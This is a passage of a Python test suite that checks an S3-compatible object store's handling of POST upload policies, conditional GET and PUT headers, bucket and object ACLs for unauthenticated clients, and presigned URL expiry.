policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
["eq", "$x-amz-meta-foo", ""]
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('x-amz-meta-foo' , 'barclamp'),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy missing expiration error')
def test_post_object_missing_expires_condition():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy missing conditions error')
def test_post_object_missing_conditions_list():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ")}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with allowable upload size exceeded error')
def test_post_object_upload_size_limit_exceeded():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
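    # a content-length-range of 0..0 cannot accommodate the 3-byte 'bar' payload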
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 0],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid content length error')
def test_post_object_missing_content_length_argument():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
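    # content-length-range below is given only a minimum; the missing maximum makes the policy invalid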
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid JSON error')
def test_post_object_invalid_content_length_argument():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
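    # the negative minimum in content-length-range makes the policy invalid, so the POST is rejected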
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", -1, 0],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with upload size less than minimum allowable error')
def test_post_object_upload_size_below_minimum():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
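    # the 3-byte 'bar' payload falls below the 512-byte minimum declared in content-length-range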
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 512, 1000],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='empty conditions return appropriate error response')
def test_post_object_empty_conditions():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{ }\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Match: the latest ETag')
@attr(assertion='succeeds')
def test_get_object_ifmatch_good():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
etag = response['ETag']
response = client.get_object(Bucket=bucket_name, Key='foo', IfMatch=etag)
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Match: bogus ETag')
@attr(assertion='fails 412')
def test_get_object_ifmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfMatch='"ABCORZ"')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-None-Match: the latest ETag')
@attr(assertion='fails 304')
def test_get_object_ifnonematch_good():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
etag = response['ETag']
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfNoneMatch=etag)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 304)
eq(e.response['Error']['Message'], 'Not Modified')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-None-Match: bogus ETag')
@attr(assertion='succeeds')
def test_get_object_ifnonematch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo', IfNoneMatch='ABCORZ')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Modified-Since: before')
@attr(assertion='succeeds')
def test_get_object_ifmodifiedsince_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo', IfModifiedSince='Sat, 29 Oct 1994 19:43:31 GMT')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Modified-Since: after')
@attr(assertion='fails 304')
def test_get_object_ifmodifiedsince_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
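    # construct an If-Modified-Since timestamp one second after the object's mtime,
    # then sleep so the GET is issued after that instant and the 304 path is exercised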
last_modified = str(response['LastModified'])
last_modified = last_modified.split('+')[0]
mtime = datetime.datetime.strptime(last_modified, '%Y-%m-%d %H:%M:%S')
after = mtime + datetime.timedelta(seconds=1)
after_str = time.strftime("%a, %d %b %Y %H:%M:%S GMT", after.timetuple())
time.sleep(1)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfModifiedSince=after_str)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 304)
eq(e.response['Error']['Message'], 'Not Modified')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Unmodified-Since: before')
@attr(assertion='fails 412')
def test_get_object_ifunmodifiedsince_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfUnmodifiedSince='Sat, 29 Oct 1994 19:43:31 GMT')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Unmodified-Since: after')
@attr(assertion='succeeds')
def test_get_object_ifunmodifiedsince_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo', IfUnmodifiedSince='Sat, 29 Oct 2100 19:43:31 GMT')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='data re-write w/ If-Match: the latest ETag')
@attr(assertion='replaces previous data and metadata')
@attr('fails_on_aws')
def test_put_object_ifmatch_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
etag = response['ETag'].replace('"', '')
# pass in custom header 'If-Match' before PutObject call
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': etag}))
client.meta.events.register('before-call.s3.PutObject', lf)
response = client.put_object(Bucket=bucket_name,Key='foo', Body='zar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'zar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Match: bogus ETag')
@attr(assertion='fails 412')
def test_put_object_ifmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
# pass in custom header 'If-Match' before PutObject call
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '"ABCORZ"'}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='zar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-Match: *')
@attr(assertion='replaces previous data and metadata')
@attr('fails_on_aws')
def test_put_object_ifmatch_overwrite_existed_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
response = client.put_object(Bucket=bucket_name,Key='foo', Body='zar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'zar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite non-existing object w/ If-Match: *')
@attr(assertion='fails 412')
@attr('fails_on_aws')
def test_put_object_ifmatch_nonexisted_failed():
bucket_name = get_new_bucket()
client = get_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-None-Match: outdated ETag')
@attr(assertion='replaces previous data and metadata')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': 'ABCORZ'}))
client.meta.events.register('before-call.s3.PutObject', lf)
response = client.put_object(Bucket=bucket_name,Key='foo', Body='zar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'zar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-None-Match: the latest ETag')
@attr(assertion='fails 412')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
etag = response['ETag'].replace('"', '')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': etag}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='zar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite non-existing object w/ If-None-Match: *')
@attr(assertion='succeeds')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_nonexisted_good():
bucket_name = get_new_bucket()
client = get_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-None-Match: *')
@attr(assertion='fails 412')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_overwrite_existed_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='zar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
def _setup_bucket_object_acl(bucket_acl, object_acl):
"""
    Create a new bucket with the given bucket ACL, put an empty
    'foo' key with the given object ACL, and return the bucket name.
"""
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL=bucket_acl, Bucket=bucket_name)
client.put_object(ACL=object_acl, Bucket=bucket_name, Key='foo')
return bucket_name
def _setup_bucket_acl(bucket_acl=None):
"""
set up a new bucket with specified acl
"""
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL=bucket_acl, Bucket=bucket_name)
return bucket_name
@attr(resource='object')
@attr(method='get')
@attr(operation='publicly readable bucket')
@attr(assertion='bucket is readable')
def test_object_raw_get():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='deleted object and bucket')
@attr(assertion='fails 404')
def test_object_raw_get_bucket_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
client.delete_bucket(Bucket=bucket_name)
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='deleted object and bucket')
@attr(assertion='fails 404')
def test_object_delete_key_bucket_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
client.delete_bucket(Bucket=bucket_name)
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.delete_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='deleted object')
@attr(assertion='fails 404')
def test_object_raw_get_object_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
@attr(resource='bucket')
@attr(method='head')
@attr(operation='head bucket')
@attr(assertion='succeeds')
def test_bucket_head():
bucket_name = get_new_bucket()
client = get_client()
response = client.head_bucket(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='non-existent bucket')
@attr(assertion='fails 404')
def test_bucket_head_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.head_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
# n.b., RGW does not send a response document for this operation,
# which seems consistent with
# https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
#eq(error_code, 'NoSuchKey')
@attr('fails_on_aws')
@attr(resource='bucket')
@attr(method='head')
@attr(operation='read bucket extended information')
@attr(assertion='extended information is getting updated')
def test_bucket_head_extended():
bucket_name = get_new_bucket()
client = get_client()
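    # x-rgw-object-count and x-rgw-bytes-used are RGW-specific extension headers,
    # which is why this test carries the fails_on_aws attribute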
response = client.head_bucket(Bucket=bucket_name)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-object-count']), 0)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-bytes-used']), 0)
_create_objects(bucket_name=bucket_name, keys=['foo','bar','baz'])
response = client.head_bucket(Bucket=bucket_name)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-object-count']), 3)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-bytes-used']), 9)
@attr(resource='bucket.acl')
@attr(method='get')
@attr(operation='unauthenticated on private bucket')
@attr(assertion='succeeds')
def test_object_raw_get_bucket_acl():
bucket_name = _setup_bucket_object_acl('private', 'public-read')
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object.acl')
@attr(method='get')
@attr(operation='unauthenticated on private object')
@attr(assertion='fails 403')
def test_object_raw_get_object_acl():
bucket_name = _setup_bucket_object_acl('public-read', 'private')
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='authenticated on public bucket/object')
@attr(assertion='succeeds')
def test_object_raw_authenticated():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='authenticated on private bucket/private object with modified response headers')
@attr(assertion='succeeds')
def test_object_raw_response_headers():
bucket_name = _setup_bucket_object_acl('private', 'private')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo', ResponseCacheControl='no-cache', ResponseContentDisposition='bla', ResponseContentEncoding='aaa', ResponseContentLanguage='esperanto', ResponseContentType='foo/bar', ResponseExpires='123')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], 'foo/bar')
eq(response['ResponseMetadata']['HTTPHeaders']['content-disposition'], 'bla')
eq(response['ResponseMetadata']['HTTPHeaders']['content-language'], 'esperanto')
eq(response['ResponseMetadata']['HTTPHeaders']['content-encoding'], 'aaa')
eq(response['ResponseMetadata']['HTTPHeaders']['cache-control'], 'no-cache')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='authenticated on private bucket/public object')
@attr(assertion='succeeds')
def test_object_raw_authenticated_bucket_acl():
bucket_name = _setup_bucket_object_acl('private', 'public-read')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='authenticated on public bucket/private object')
@attr(assertion='succeeds')
def test_object_raw_authenticated_object_acl():
bucket_name = _setup_bucket_object_acl('public-read', 'private')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='authenticated on deleted object and bucket')
@attr(assertion='fails 404')
def test_object_raw_authenticated_bucket_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
client.delete_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='authenticated on deleted object')
@attr(assertion='fails 404')
def test_object_raw_authenticated_object_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
@attr(resource='object')
@attr(method='get')
@attr(operation='x-amz-expires check not expired')
@attr(assertion='succeeds')
def test_object_raw_get_x_amz_expires_not_expired():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=100000, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='check x-amz-expires value out of range zero')
@attr(assertion='fails 403')
def test_object_raw_get_x_amz_expires_out_range_zero():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=0, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='check x-amz-expires value out of max range')
@attr(assertion='fails 403')
def test_object_raw_get_x_amz_expires_out_max_range():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
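    # 609901 seconds exceeds the 604800-second (7-day) maximum allowed for X-Amz-Expires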
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=609901, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='check x-amz-expires value out of positive range')
@attr(assertion='fails 403')
def test_object_raw_get_x_amz_expires_out_positive_range():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
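    # a negative ExpiresIn yields a presigned URL that has already expired by the time it is used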
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=-7, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='unauthenticated, no object acls')
@attr(assertion='fails 403')
def test_object_anon_put():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo')
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.put_object, Bucket=bucket_name, Key='foo', Body='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='put')
@attr(operation='unauthenticated, publicly writable object')
@attr(assertion='succeeds')
def test_object_anon_put_write_access():
bucket_name = _setup_bucket_acl('public-read-write')
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo')
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.put_object(Bucket=bucket_name, Key='foo', Body='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='put')
@attr(operation='authenticated, no object acls')
